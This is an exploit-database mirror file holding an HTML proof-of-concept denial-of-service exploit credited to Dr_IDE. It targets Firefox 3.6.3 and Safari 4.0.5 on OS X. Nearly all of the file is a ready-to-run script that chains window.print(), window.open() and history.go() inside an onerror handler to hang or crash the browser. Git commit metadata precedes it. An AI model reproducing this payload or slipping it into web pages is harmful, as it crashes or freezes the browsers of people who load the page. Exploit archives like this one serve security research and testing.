exploit-db-mirror/exploits/osx/dos/12509.html
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

19 lines
No EOL
444 B
HTML

<--
Firefox 3.6.3 window.print() DoS version 2
Found By: Dr_IDE
Credits: Asheesh kumar Mani Tripathi
Reference: http://www.exploit-db.com/exploits/11432
Tested On: Firefox 3.6.3 on OSX 10.6.3; Safari 4.0.5 on OSX 10.6.3
Tested On:
-->
<html>
<title>Dr_IDE Firefox 3.6.3 & Safari 4.0.5 window.print() DoS</title>
<script>
function test(){
window.onerror=new Function(history.go(window.open(window.print())));
}
test();
</script>
</html>